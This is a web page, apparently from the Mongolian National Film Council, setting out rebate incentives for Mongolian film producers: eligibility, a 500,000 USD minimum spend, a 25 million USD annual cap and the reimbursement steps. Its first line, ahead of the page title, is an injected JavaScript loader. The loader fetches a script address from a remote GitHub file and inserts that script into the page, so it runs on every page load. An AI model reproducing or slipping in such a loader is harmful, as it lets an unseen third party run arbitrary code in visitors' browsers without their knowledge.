;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Incentives for Mongolian producers - Mongolian National Film Council

Incentives for Mongolian producers

Mongolian productions can receive up to 20% of reimbursement on eligible costs with minimum spending of 500,000 USD

IncentivesIncentives for Mongolian producers

Mongolian productions can receive up to 20% of reimbursement on eligible costs with minimum spending of 500,000 USD and meeting the following requirements:

  • A film positively promoted Mongolia internationally within the last two years and meets the Cultural Test.
  • Selected by international film festivals approved by The International Federation of Film Producers’ Associations (FIAPF).

Minimum spend: 500,000 USD

Total annual rebate cap: 25 million USD

Eligible projects: Feature films, series, animated and live-action projects, and documentaries

Eligible expenditures: filming and post-production

  • Filming & postproduction
  • Additional culture test reimbursement
  • Plus, foreign talent renumeration reimbursement
  • Minimum spend
    $ 500,000 USD
  • Total rebate cap per year
    $25 million USD
  • Provisional agreement
    within 3 months after submission
  • Eligible project
    Feature films, Series, Animated or live-action projects, and documentary
  • Eligible expenditures
    filming, post-production and foreign cast & crew renumeration

Steps and procedures of reimbursement:


Apply for film permit


Request provisional qualification from the Council


Assessment of the project by the Council


The Council issues provisional certificate with duration up to 4 years


Start spending in Mongolia with minimum cap of 500,000USD


Request final qualification from the Council 60 days prior to expiration of the issued provisional certificate

Steps and procedures of reimbursement:

  1. Start spending in Mongolia with a minimum cap of 500,000USD
  2. Release the film and promote Mongolia positively within two years
  3. Be selected by the international film festivals
  4.  Submit your project to the Council for reimbursement on eligible costs